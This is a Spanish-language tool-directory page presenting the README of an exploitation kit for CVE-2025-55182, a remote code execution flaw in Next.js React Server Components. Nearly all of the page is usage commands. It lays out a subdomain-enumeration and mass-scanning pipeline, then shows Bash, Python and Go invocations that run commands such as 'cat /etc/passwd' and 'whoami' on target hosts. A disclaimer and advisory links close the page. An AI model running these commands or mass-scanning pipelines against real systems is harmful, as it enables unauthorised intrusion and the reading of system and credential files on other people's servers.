Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-Simple-Scanner — Escáner de RCE de alta fidelidad para CVE-2025-55182 que afecta a Next.js RSC. Admite escaneo masivo, ejecución de comandos y pipelines de reconocimiento automatizados. Diseñado para pentesters, investigadores y cazadores de recompensas. | Kitploit
Herramientas/GitHubGitHub/satriarizka/cve-2025-55182-simple-scanner
ReconocimientoEscáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
GitHub
satriarizka/cve-2025-55182-simple-scanner

CVE-2025-55182-Simple-Scanner

Escáner de RCE de alta fidelidad para CVE-2025-55182 que afecta a Next.js RSC. Admite escaneo masivo, ejecución de comandos y pipelines de reconocimiento automatizados. Diseñado para pentesters, investigadores y cazadores de recompensas.

Ver Repositorio
hace 8 mesesAún no revisado
Compartir

CVE-2025-55182: React Server Components RCE Scanner

Un kit de herramientas integral para detectar y explotar CVE-2025-55182, una vulnerabilidad crítica de Ejecución Remota de Código en aplicaciones Next.js que utilizan Componentes del Servidor React.

Este repositorio incluye un escáner unificado en Bash (modo único y masivo), implementaciones en Python/Go y un flujo de trabajo de reconocimiento para bug bounty.

Menú del escáner Demostración del escáner


📂 Estructura del Repositorio

  • scanner.sh — Script Bash todo-en-uno para escaneo de objetivo único y masivo
  • python/exploit.py — Implementación estable en Python (mejor escape de JSON)
  • go/main.go — Implementación de alto rendimiento (compilable)

🚀 Flujo de Trabajo de Reconocimiento (Metodología Bug Bounty)

Para la caza masiva en dominios comodín, usa este pipeline para filtrar objetivos antes del escaneo:

root@kitploit:~
# 1. Enumerar subdominios
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filtrar hosts activos
httpx -l subs.txt -o live.txt

# 3. Detección previa con Nuclei (opcional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Uso del Escáner Bash (Recomendado)

El script scanner.sh admite escaneo de objetivo único y escaneo masivo desde un archivo de lista.

🔧 Instalación

root@kitploit:~
chmod +x scanner.sh

1️⃣ Modo de Objetivo Único

Ideal para verificar un objetivo específico con salida detallada.

root@kitploit:~
# Verificación básica (usa "id" por defecto)
./scanner.sh -d example.com

# Ejecutar comando personalizado
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Modo de Escaneo Masivo

Escanea eficientemente una lista de URL y guarda los hosts vulnerables en un archivo.

root@kitploit:~
# Escanear una lista de URL
./scanner.sh -l live.txt -c "whoami"

# Archivo de salida personalizado
./scanner.sh -l live.txt -o my_bounty.txt

Opciones


🐍 Versión en Python

Úsala si encuentras problemas con el escape de caracteres especiales en Bash.

Requisitos

root@kitploit:~
pip install requests

Uso

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Versión en Go

Alto rendimiento, dependencias mínimas.

Ejecutar directamente

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Compilar binario

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Aviso Legal

Esta herramienta es únicamente para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado es estrictamente ilegal. El desarrollador no asume ninguna responsabilidad por el mal uso o los daños causados por este programa.


🔗 Referencias

  • Detalle CVE de NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • Aviso de seguridad de React (vulnerabilidad en Componentes del Servidor React): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • Plantilla Nuclei de ProjectDiscovery: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Descargar herramienta
FlagDescripción
-d, --domainURL de objetivo único
-l, --listArchivo que contiene la lista de URL
-c, --commandComando a ejecutar (por defecto: id)
-o, --outputArchivo de salida para hosts vulnerables (por defecto: vulnerable_hosts.txt)